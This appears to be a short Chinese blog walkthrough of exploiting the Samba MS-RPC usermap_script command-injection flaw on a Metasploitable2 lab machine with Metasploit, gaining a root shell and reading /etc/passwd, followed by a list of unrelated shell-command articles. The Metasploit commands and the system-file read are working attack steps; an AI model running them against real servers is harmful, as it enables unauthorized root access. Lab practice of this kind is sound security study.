Samba MS-RPC Shell命令注入漏洞

简介: 靶场环境:metasploitable2靶机地址:192.168.0.109攻击机地址:192.168.0.114首先打开kali,启动msf框架

靶场环境:metasploitable2

靶机地址:192.168.0.109

攻击机地址:192.168.0.114

首先打开kali,启动msf框架

sudo msfdb run

image.png搜索漏洞模块

image.png

选择要利用的模块:

use exploit/multi/samba/usermap_script

image.png

查看所需要设置的参数

show options

我们看到只需要设置RHOSTS(靶机地址)

set rhosts 192.168.0.109

image.png

开始攻击

exploit

image.png

攻击成功

试着执行一下ls命令

image.png

执行成功

whoami查看当前权限为root

image.png

查看靶机ip

ip a

image.png

查看敏感文件

cat /etc/passwd

image.png

ctrl+c退出

目录
相关文章
|
1月前
|
人工智能 Shell iOS开发
AI Shell:在命令行里“对话” AI ,微软推出将 AI 助手引入命令行的 CLI 工具,打造对话式交互命令行
AI Shell 是一款强大的 CLI 工具,将人工智能直接集成到命令行中,帮助用户提高生产力。AI Shell 支持多种 AI 模型和助手,通过多代理框架提供丰富的功能和灵活的使用模式。
135 7
|
1月前
|
Java Shell Windows
java Runtime.exec()执行shell/cmd命令:常见的几种陷阱与一种完善实现
java Runtime.exec()执行shell/cmd命令:常见的几种陷阱与一种完善实现
46 1
|
2月前
|
Web App开发 网络协议 Linux
linux命令总结(centos):shell常用命令汇总,平时用不到,用到就懵逼忘了,于是专门写了这篇论文,【便持续更新】
这篇文章是关于Linux命令的总结,涵盖了从基础操作到网络配置等多个方面的命令及其使用方法。
80 1
linux命令总结(centos):shell常用命令汇总,平时用不到,用到就懵逼忘了,于是专门写了这篇论文,【便持续更新】
|
2月前
|
Shell 知识图谱
Shell printf 命令
10月更文挑战第3天
26 1
|
2月前
|
存储 安全 Shell
上传漏洞利用时,没有回显上传目录怎么连接shell
上传漏洞利用时,没有回显上传目录怎么连接shell
|
2月前
|
Unix Shell Linux
常见的shell命令
shell常用命令
60 11
|
3月前
|
Shell Linux
Linux shell编程学习笔记82:w命令——一览无余
Linux shell编程学习笔记82:w命令——一览无余
|
3月前
|
Java Shell Windows
java Runtime.exec()执行shell/cmd命令:常见的几种陷阱与一种完善实现
java Runtime.exec()执行shell/cmd命令:常见的几种陷阱与一种完善实现
156 5
|
2月前
|
Shell PHP
Shell echo命令
10月更文挑战第3天
25 0
|
2月前
|
JSON Java Shell
Dockerfile中RUN、CMD、ENTRYPOINT、SHELL命令的区别
理解这些指令的差异和应用场景,有助于构建高效、灵活且易于管理的Docker镜像。在实际应用中,根据需要选择合适的指令,可以有效地控制镜像构建和容器运行的行为。
241 0